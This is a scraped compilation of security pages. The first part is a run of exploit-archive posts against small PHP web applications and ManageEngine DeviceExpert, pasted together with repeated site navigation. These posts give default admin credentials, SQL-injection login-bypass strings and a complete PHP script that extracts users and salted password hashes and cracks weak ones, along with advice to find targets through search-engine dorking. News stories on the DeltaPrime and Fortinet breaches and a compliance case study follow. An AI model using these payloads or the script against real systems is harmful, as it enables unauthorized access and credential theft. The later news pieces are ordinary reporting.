IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

**IFSC Code Finder Portal 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

IFSC Code Finder Portal version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 4c8714f261d6bcdc7f5ee89b4f1473342ced816a03f174b9a8bc607a329616e0

Download | Favorite | View

**IFSC Code Finder Portal 1.0 Insecure Settings**

    =============================================================================================================================================| # Title     : IFSC Code Finder Portal v1.0 Insecure Settings Vulnerability                                                                || # Author    : indoushka                                                                                                                   || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits)                                                            || # Vendor    : https://phpgurukul.com/ifsc-code-finder-project-using-php/                                                                  |=============================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload : user =  admin & pass = Test@123[+] http://127.0.0.1/ifscfinder/admin/login.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

IFSC Code Finder Portal 1.0 Insecure Settings

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

**GYM Management System 1.0 Insecure Settings**

Posted Sep 16, 2024

Authored by indoushka

GYM Management System version 1.0 suffers from an ignored default credential vulnerability.

tags | exploit

SHA-256 | 5ee11f413d4f6dbbb71c2d782424145f8284d96790518d7c0e3923c5bd409844

Download | Favorite | View

**GYM Management System 1.0 Insecure Settings**

    ====================================================================================================================================| # Title     : GYM Management System 1.0 Insecure Settings Vulnerability                                                          || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/gym-management-system-using-php-and-mysql/                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin@gmail.com      Password: Test@123[+] http://127.0.0.1/agms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

**File Tags**

*   ActiveX (933)
*   Advisory (86,759)
*   Arbitrary (17,063)
*   BBS (2,859)
*   Bypass (1,915)
*   CGI (1,047)
*   Code Execution (7,895)
*   Conference (692)
*   Cracker (844)
*   CSRF (3,423)
*   DoS (25,236)
*   Encryption (2,394)
*   Exploit (54,214)
*   File Inclusion (4,273)
*   File Upload (1,012)
*   Firewall (822)
*   Info Disclosure (2,913)
*   Intrusion Detection (918)
*   Java (3,156)
*   JavaScript (908)
*   Kernel (7,272)
*   Local (14,848)
*   Magazine (587)
*   Overflow (13,212)
*   Perl (1,435)
*   PHP (5,262)
*   Proof of Concept (2,409)
*   Protocol (3,749)
*   Python (1,656)
*   Remote (31,860)
*   Root (3,671)
*   Rootkit (529)
*   Ruby (640)
*   Scanner (1,657)
*   Security Tool (8,046)
*   Shell (3,303)
*   Shellcode (1,219)
*   Sniffer (904)
*   Spoof (2,292)
*   SQL Injection (16,716)
*   TCP (2,463)
*   Trojan (690)
*   UDP (919)
*   Virus (673)
*   Vulnerability (33,064)
*   Web (10,136)
*   Whitepaper (3,784)
*   x86 (970)
*   XSS (18,290)
*   Other

**File Archives**

*   September 2024
*   August 2024
*   July 2024
*   June 2024
*   May 2024
*   April 2024
*   March 2024
*   February 2024
*   January 2024
*   December 2023
*   November 2023
*   October 2023
*   Older

**Systems**

*   AIX (430)
*   Apple (2,104)
*   BSD (378)
*   CentOS (61)
*   Cisco (1,954)
*   Debian (7,120)
*   Fedora (1,693)
*   FreeBSD (1,247)
*   Gentoo (4,567)
*   HPUX (881)
*   iOS (387)
*   iPhone (108)
*   IRIX (220)
*   Juniper (71)
*   Linux (51,142)
*   Mac OS X (696)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (489)
*   RedHat (16,780)
*   Slackware (941)
*   Solaris (1,615)
*   SUSE (1,444)
*   Ubuntu (9,828)
*   UNIX (9,454)
*   UnixWare (188)
*   Windows (6,766)
*   Other

GYM Management System 1.0 Insecure Settings

Emergency Ambulance Hiring Portal version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Emergency Ambulance Hiring Portal 1.0 Auth By Pass Vulnerability                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/emergency-ambulance-hiring-portal-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer & PASs : ' or 0=0 ##[+] http://127.0.0.1/eahp/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Emergency Ambulance Hiring Portal 1.0 SQL Injection

ManageEngine DeviceExpert version 5.9.7 build 5970 allows for usernames and salted MD5 password hashes to be disclosed.

    ====================================================================================================================================| # Title     : DeviceExpert v 5.9.7 build 5970 PHP extracts Credentials Vulnerability                                             || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://manageengine.com/                                                                                          |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] This PHP COde extracts usernames and salted MD5 password hashes from ManageEngine DeviceExpert version 5.9 build 5980 and prior.[+] LIne 87 set your targer .    [+] usage : C:\www\test>php 3.php[+] Payload :<?phpclass ManageEngineDeviceExpert {    private $host;    private $port;    private $ssl;    public function __construct($host, $port = 6060, $ssl = true) {        $this->host = $host;        $this->port = $port;        $this->ssl = $ssl;    }    private function sendRequest($path) {        $url = ($this->ssl ? 'https://' : 'http://') . $this->host . ':' . $this->port . $path;        $ch = curl_init($url);        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);        $response = curl_exec($ch);        curl_close($ch);        return $response;    }    public function getUsers() {        echo "Reading users from master...\n";        $response = $this->sendRequest('/ReadUsersFromMasterServlet');        if (!$response) {            echo "Connection failed\n";            return null;        }        if (strpos($response, '<discoverydata>') !== false) {            preg_match_all('/<discoverydata>(.*?)<\/discoverydata>/', $response, $matches);            echo "Found " . count($matches[0]) . " users\n";            return $matches[0];        } else {            echo "Could not find any users\n";            return null;        }    }    public function parseUserData($user) {        if (!$user) return null;        preg_match('/<username>([^<]+)<\/username>/', $user, $username);        preg_match('/<password>([^<]+)<\/password>/', $user, $encoded_hash);        preg_match('/<userrole>([^<]+)<\/userrole>/', $user, $role);        preg_match('/<emailid>([^<]+)<\/emailid>/', $user, $email);        preg_match('/<saltvalue>([^<]+)<\/saltvalue>/', $user, $salt);        $hash = base64_decode($encoded_hash[1]);        $password = null;        $weak_passwords = ['12345', 'admin', 'password', $username[1]];        foreach ($weak_passwords as $weak_password) {            if (md5($weak_password . $salt[1]) == bin2hex($hash)) {                $password = $weak_password;                break;            }        }        return [            'username' => $username[1],            'password' => $password,            'hash' => bin2hex($hash),            'role' => $role[1],            'email' => $email[1],            'salt' => $salt[1]        ];    }    public function run() {        $users = $this->getUsers();        if (!$users) return;        foreach ($users as $user) {            $user_data = $this->parseUserData($user);            if (!$user_data) continue;            echo "User: " . $user_data['username'] . "\n";            echo "Password: " . ($user_data['password'] ? $user_data['password'] : 'Not found') . "\n";            echo "Hash: " . $user_data['hash'] . "\n";            echo "Role: " . $user_data['role'] . "\n";            echo "Email: " . $user_data['email'] . "\n";            echo "Salt: " . $user_data['salt'] . "\n";            echo "----------------------------\n";        }    }}// استخدام الكلاس$deviceExpert = new ManageEngineDeviceExpert('127.0.0.1');$deviceExpert->run();?>Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

ManageEngine DeviceExpert 5.9.7 Build 5970 Hash Disclosure

COVID19 Testing Management System version 1.0 suffers from an ignored default credential vulnerability.

    ====================================================================================================================================| # Title     : COVID19 - Testing Management System 1.0 Insecure Settings Vulnerability                                            || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/covid19-testing-management-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Insecure Settings : appears to leave a default administrative account in place post installation.[+] use payload :     Username: admin      Password: Test@123[+] http://127.0.0.1/covid-tms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

COVID19 Testing Management System 1.0 Insecure Settings

BP Monitoring Management System version 1.0 version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : BP Monitoring Management System 1.0 Auth By Pass Vulnerability                                                     || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/bp-monitoring-management-system-using-php-and-mysql/                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = 'or''='@gmail.com & PASs : ' or 0=0 ##[+] http://127.0.0.1/bpmms/edit-family-member.php?fmid=1Greetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

BP Monitoring Management System 1.0 SQL Injection

Auto/Taxi Stand Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.

    ====================================================================================================================================| # Title     : Auto/Taxi Stand Management System 1.0 Auth By Pass Vulnerability                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.0 (64 bits)                                                   || # Vendor    : https://phpgurukul.com/auto-taxi-stand-management-system-using-php-and-mysql/                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] use payload : USer = ' or 0=0 ## & PASs : ' or 0=0 ##[+] http://127.0.0.1/atsms/admin/dashboard.phpGreetings to :==================================================jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R |================================================================

Auto/Taxi Stand Management System 1.0 SQL Injection

DeltaPrime DeFi platform suffers a $5.98M hack on the Arbitrum chain due to a private key leak. The attack compromised several liquidity pools, and the team is working on asset recovery and minimizing user losses.

In the early hours of September 16, 2024, DeltaPrime, a prominent decentralized finance (**DeFi**) platform, announced that its Arbitrum-based protocol, DeltaPrime Blue, was exploited in a cyber attack that drained approximately $5.98 million.

According to an official tweet from DeltaPrime at 9:55 AM, the exploit occurred at 6:14 AM CET and was traced to a compromised private key. The team reassured users that the issue is limited to the **Arbitrum chain**, with the Avalanche-based DeltaPrime Red unaffected due to its use of multisig wallets and cold storage for added security.

The company emphasized that they are actively working on asset retrieval and that the platform’s insurance pool is expected to cover losses where possible. Additionally, DeltaPrime is exploring further measures to minimize user losses, pledging ongoing updates through social media and Discord.

> DeltaPrime Blue exploited, this is the current status:
> 
> At 6:14 AM CET DeltaPrime Blue (Arbitrum) was attacked and drained for $5.98M. This was due to a compromised private key, the source of which is currently under investigation.
> 
> DeltaPrime Red (Avalanche) is not vulnerable…
> 
> — DeltaPrime (@DeltaPrimeDefi) September 16, 2024

The attack was first flagged by Cyvers Alerts, a blockchain security platform, which detected suspicious transactions related to DeltaPrime Blue on the Arbitrum chain. In a tweet at 7:36 AM, Cyvers reported multiple suspicious transactions draining liquidity pools, such as DPUSDC, DPARB, and DPBTCb.

They noted that the attacker had already swapped large amounts of USDC for ETH, with the total loss estimated at $4.5 million at the time. An hour later, Cyvers updated their estimate, stating that the losses had increased to $5.93 million, confirming that the attacker had taken control of the private key for DeltaPrime’s admin wallet, allowing them to upgrade proxy contracts and direct them to malicious ones.

> 🚨ALERT🚨@DeltaPrimeDefi has faced a security incident on their admin keys.  
> Attacker had control on the private key of 0x40e4ff9e018462ce71fa34abdfa27b8c5e2b1afb  
> then he upgraded the proxy!
> 
> So far $5.93M has been drained!
> 
> Want to keep your company off our alerts radar? Learn… https://t.co/yOmNZJyp5l pic.twitter.com/lztFvXVmfI
> 
> — 🚨 Cyvers Alerts 🚨 (@CyversAlerts) September 16, 2024

In a comment to Hackread.com, **Meir Dolev,** CTO of CyVers stated _“_The hacker took control of the admin wallet for DeltaPrime’s proxy contracts, later upgrading these contracts to point to his malicious contract, which enabled the draining of the pools on the Arbitrum chain. The total loss is around $5.9 million USD._“_

As the investigation continues, DeltaPrime assures users that their funds on Avalanche remain secure, while they focus on resolving the situation on Arbitrum. Stay tuned, this article will be updated accordingly.

1.  **6 of the Best Crypto Bug Bounty Programs**
2.  **Crypto Scammer Returns $9.27M Out of $24M Crypto Theft**
3.  **Crypto Exchange FixedFloat Hacked: $26M in BTC, ETH Stolen**
4.  **Hackers Stole $59M of Crypto Via Malicious Google and X Ads**
5.  **Crypto losses reach $1.75 Billion in 2023; CeFi and Hacks Blamed**

DeltaPrime Suffers $5.98M Loss as Hacker Exploits Admin Key on Arbitrum

The incident is a reminder why organizations need to pay attention to how they store and secure data in SaaS and cloud environments.

Source: JHVEPhoto via Shutterstock

Fortinet has confirmed the compromise of data belonging to a "small number" of its customers, after a hacker using the somewhat colorful moniker "Fortibitch" leaked 440GB of the information via BreachForums this week.

The hacker claimed to have obtained the data from an Azure SharePoint site and alleges they leaked it after the company refused to negotiate with the individual on a ransom demand. The situation once again highlights the responsibility that companies have to secure data held in third-party cloud repositories, researchers say.

Fortinet itself has not specifically identified the source of the breach. But in a Sept. 12 advisory, the company said someone had gained "unauthorized access to a limited number of files stored on Fortinet’s instance of a third-party, cloud-based shared file drive."

The security vendor, one of the largest in the world by market cap, identified the issue as impacting less than 0.3% of its more than 775,000 customers worldwide, which would place the number of affected organizations at around 2,325.

Fortinet said it had seen no signs of malicious activity around the compromised data. "Fortinet immediately executed on a plan to protect customers and communicated directly with customers as appropriate and supported their risk mitigation plans," the security vendor noted in the advisory. "The incident did not involve any data encryption, deployment of ransomware, or access to Fortinet’s corporate network." Fortinet said it does not expect the incident to have any material impact on its operations or finances.

In a threat intelligence report shared with Dark Reading, CloudSEK said it had observed a threat actor using the Fortibitch handle leaking what appeared to include not just customer data, but also financial and marketing documents, product information, HR data from India, and some employee data.

"The actor attempted to extort the company but, after unsuccessful negotiations, released the data," CloudSEK said.  The company surmised that the hacker would have attempted to sell the data first, if it had been of any true value.

Fortinet did not confirm or deny if the hacker had attempted to engage with the company on the stolen data.

The hacker's post on BreachForums included somewhat context-free references to Fortinet's acquisitions of Lacework and NextDLP. It also referenced a few other threat actors, the most interesting of whom is a Ukrainian outfit tracked as DC8044. "There are no direct links between Fortibitch and DC8044, but the tone suggests a history between the two," according to CloudSEK. "Based on the available information, we can ascertain with medium confidence that the threat actor is based out of Ukraine."

**Breach a Reminder of Cloud Data Exposure Risks**

The Fortinet compromise — though apparently not too major — is a reminder of the heightened data exposure risks to enterprise organizations when using software-as-a-service (SaaS) and other cloud services without the appropriate guardrails. A recent scan by Metomic of some 6.5 million Google Drive files showed more than 40% of them containing sensitive data, including employee data and spreadsheets containing passwords.

Often, organizations stored the data on Google Drive files with little protection. More than one-third (34.2%) of the scanned files were shared with external email addresses, and more than 350,000 files had been shared publicly.

Rich Vibert, CEO and founder of Metomic, says there are three fundamental mistakes organizations make when it comes to protecting data in cloud environments: not using multifactor authentication (MFA) to control access to SaaS apps; giving employees too much access to folders and sensitive assets within the app itself; and storing sensitive data for too long.

It's unclear yet how the hacker might have accessed the data from Fortinet's SharePoint environment. But one likely scenario is that the attacker gained access to valid login credentials, via phishing for instance, and then logged in and exfiltrated data from SharePoint and similar environments, says Koushik Pal, threat intelligence reporter at CloudSEK. Information stealers are also a "really common" attack vector, Pal notes.

**Rethinking Cloud Security**

"Typically, developers should use environment variables, vaults, or encrypted storage for sensitive information, and avoid hardcoding credentials in source code," Pal says. Often developers hardcode access credentials like API keys, username and password into the source code and inadvertently push the code into a public or unsecured private repository from where they can be accessed relatively easily.

"Organizations should make MFA mandatory for accessing SharePoint and other critical systems to prevent unauthorized access even if credentials are compromised," Pal explains. "Monitor repositories on a regular basis for exposed credentials, sensitive data, or misconfigurations, and enforce security best practices across all teams."

Akhil Mittal, senior manager of cybersecurity at Synopsys Software Integrity Group, says incidents like the one Fortinet experienced show why it's a mistake for organizations to leave security around their cloud assets entirely to cloud service providers. "Organizations should rethink how they store customer data in shared drives, ensuring critical information is kept separate from less sensitive files," he says.

It's a good idea too to encrypt sensitive data both in transit and at rest, to mitigate damage even if attackers gain access. Mittal perceives continuous monitoring of cloud assets as fundamental to protecting them. "Applying zero-trust principles to third-party platforms also ensures no external service is trusted automatically, reducing the risk of unauthorized access," he adds.

Don't miss the latest Dark Reading Confidential podcast, where we talk to two cybersecurity professionals who were arrested in Dallas County, Iowa, and forced to spend the night in jail — just for doing their pen-testing jobs. Listen now!

**About the Author**

Jai Vijayan is a seasoned technology reporter with over 20 years of experience in IT trade journalism. He was most recently a Senior Editor at Computerworld, where he covered information security and data privacy issues for the publication. Over the course of his 20-year career at Computerworld, Jai also covered a variety of other technology topics, including big data, Hadoop, Internet of Things, e-voting, and data analytics. Prior to Computerworld, Jai covered technology issues for The Economic Times in Bangalore, India. Jai has a Master's degree in Statistics and lives in Naperville, Ill.

Fortinet Confirms Customer Data Breach via Third Party

In this case study, a CISO helps a B2B marketing automation company straighten out its manual compliance process by automating it.

Source: Moodboard Stock Photography via Alamy Stock Photo

Like many tech companies, Metadata.io built its B2B marketing automation business from the ground up, consistently adding key functions like personalization, prospect data enrichment, and creative micro-targeting strategies.

As it was growing, the company did its best to comply with critical attestations and standards like SOC 2 Type II and ISO 27001. But most of the focus was on building the company's core assets, not thinking of ways to streamline and automate compliance.

These frameworks aren't easy to comply with. Although they share about 60% of the same controls, they are completely different frameworks and require different processes.

The company did the best it could to comply with these controls with largely manual processes. All controls were written in spreadsheets, with no owners of specific controls and no way to ensure version control. Controls were stored in nested folders and Google Drive.

After a few years, it became clear that the compliance process simply wasn't working. To address the issue and shore up security in general, Metadata.io hired veteran CISO Raymond Taft.

**A Tangle of Manual Compliance**

"When I first got here, the company was just shy of about three months of its Series B fundraiser. It was still a very scrappy company," Taft says.

The first order of business was addressing the haphazard way Metadata.io was handling compliance. The current, largely manual system made it difficult to track compliance and ensure that controls were continuously monitored.

"Every single background check and confidentiality agreement had to be marked in a folder. It can take an enormous amount of time if you're continuously grabbing evidence for every one of those controls and putting them in these folders," Taft says. "It ends up being a nightmare to collect because you have to go back to that spreadsheet to, for example, collect evidence on specific need to things on specific days."

It was also labor-intensive, taking six people to do nothing but evidence collection. That's a lot of people when the total employee count is only 40.

Taft also discovered that the company was missing controls around background checks, performance reviews, and continuous monitoring of its cloud environment. Perhaps even more concerning was the haphazard way that data loss prevention, and security in general, was monitored and controlled.

"I knew within the first three months of working here that it would never scale as the company planned to grow to three or four times its current size," he says.

Without automation, Taft could see the writing on the wall. In addition to losing customer trust, the company would have had to continue spending a lot of money on evidence-gathering, and may have ended up outsourcing the entire function.

**Automating Compliance via Outsourcing**

Automating the compliance function was the only way Taft could see to gain control and ensure that controls were being consistently met. He didn't think it was a good idea to try to automate the function internally; not only was it not a core competency of the company, but it would incur a significant learning curve and take a significant amount of time.

Compliance automation is a good option for many enterprises, says Rik Turner, a cybersecurity analyst at Omdia.

"If your business spans multiple verticals and/or geographies, it's likely that you will be subject to multiple compliance requirements. This makes complying with them all a time- and resource-consuming undertaking, so automating your compliance activities represents significant potential savings," he says.

In addition, a typical human-driven compliance project is carried out on a monthly, quarterly, or even semi-annual basis, which means that it provides only a point-in-time view of compliance at the moment it was completed. An automated approach, on the other hand, holds the promise of continuous checking and alerting as soon as a change to the infrastructure or business processes risks slipping out of compliance, he adds.

Taft wanted a full-stack automation tool that would be able to configure policies, identify control failures or other issues, and quickly incorporate new controls. He also wanted to ensure that the solution could integrate with the stacks Metadata.io used most commonly. That included Jira, AWS, and GCP, along with its background check provider and HR platform.

"We knew if we could plug into those and continuously gather evidence, we could knock off more than 80% of our total evidence-gathering requirements for the year," he says.

There are plenty of tools that meet the requirements around continuous compliance, Turner says. More specifically, he notes that vertical and geographical breadth of coverage is key. But most importantly, he adds, potential buyers should check whether a tool that measures compliance stops at the alerting stage or can actually remediate situations when it detects that a change has caused the organization to slip out of compliance.

With these issues in mind, Taft settled on Drata for automated compliance monitoring. The tool automates evidence collection from all of its tooling, querying it every second of the day and reporting on status. It also communicates the state of Metadata.io's compliance program to auditors through a portal that also allows them to ask questions.

**Building on Good Results**

Since the implementation, Metadata.io's internal compliance team has been reduced to four people, even though the company has now grown to more than 100 employees. Taft says companies Metadata.io's size typically have compliance teams of 10 to 15.

The company also realized an unanticipated benefit: being able to fold some of its services into Drata via its trust center. Before, the company was paying $30,000 per year to upload its documentation to a trust center, where customers could access it. Drata's solution includes a trust center, saving the company that money.

That's just part of the cost savings. Taft says that all told, automated compliance has resulted in a 6x reduction in cost.

Time savings also has been substantial. For SOC 2 Type II and ISO 27001 compliance audits alone, for example, prep time went from six weeks to two weeks. Taft says that he recently met with the company's auditors for a total of five hours for the audit period. Last year that took four days.

With SOC 2 Part II and ISO 27001 fully automated and under control, Taft's next project is expanding into other compliance projects like ISO 27701, which is focused on data privacy, along with other frameworks.

The key to expanding, he says, is leveraging the automation tool's approach to control mappings and its ability to cross-map.

"There are dozens of frameworks, and they all share a little bit of DNA with each other," Taft explains. "The cross-mappings could be horrendous and could take months. For example, how does ISO 27701 relate to privacy for SOC 2?"

Drata's control and framework mapping enables users to click on a framework and see which controls apply to it. With that information, it's fairly simple to determine what's needed in terms of human resources to adopt the new framework, he says, and whether it makes sense for the business to move forward with it.

**About the Author**

Contributing Writer, Dark Reading

Karen D. Schwartz is a technology and business writer with more than 20 years of experience. She has written on a broad range of technology topics for publications including ITProToday, CIO, InformationWeek, GCN, FCW, FedTech, BizTech, eWeek, and Government Executive.

Tag

#google